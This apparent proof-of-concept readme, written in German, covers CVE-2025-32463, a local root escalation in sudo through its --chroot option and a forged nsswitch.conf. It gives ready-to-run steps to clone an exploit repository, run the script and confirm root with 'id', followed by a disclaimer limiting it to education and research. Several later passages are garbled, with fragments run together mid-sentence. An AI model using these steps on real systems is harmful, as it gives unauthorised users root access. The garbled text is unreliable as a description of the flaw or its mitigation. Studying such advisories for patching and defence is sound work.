
CVE-2025-32463
Hier ist eine Zusammenfassung von CVE-2025-32463 ohne Links:
CVE-2025-32463 ist eine lokale Privilegienausweitung in Sudo Versionen 1.9.14 bis 1.9.17. Sie missbraucht die --chroot (-R) Option, indem sie die Art und Weise manipuliert, wie Sudo nsswitch.conf behandelt. Dies erlaubt einem lokalen Angreifer, Sudo dazu zu bringen, eine bösartige Shared Library zu laden und so Root-Zugriff zu erlangen, selbst wenn der Angreifer nicht in der sudoers-Datei steht.
sudo git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
sudo -R /fake-dir some-command aus./fake-dir platziert er eine gefälschte etc/nsswitch.conf, die Sudo zwingt, Benutzer oder Gruppen über eine benutzerdefinierte Methode aufzulösen.sudo --version--chroot-Option, sofern nicht notwendigSelbst wenn ein Benutzer keine sudo-Rechte hat, kann er potenziell Root werden, indem er diesen Fehler ausnutzt. Es handelt sich um ein kritisches Problem, das viele Systeme betrifft und sofort gepatcht werden sollte.
Dieser PoC dient ausschließlich zu Bildungs- und Forschungszwecken. Die Ausführung auf einem System ohne Genehmigung ist illegal und unethisch !!!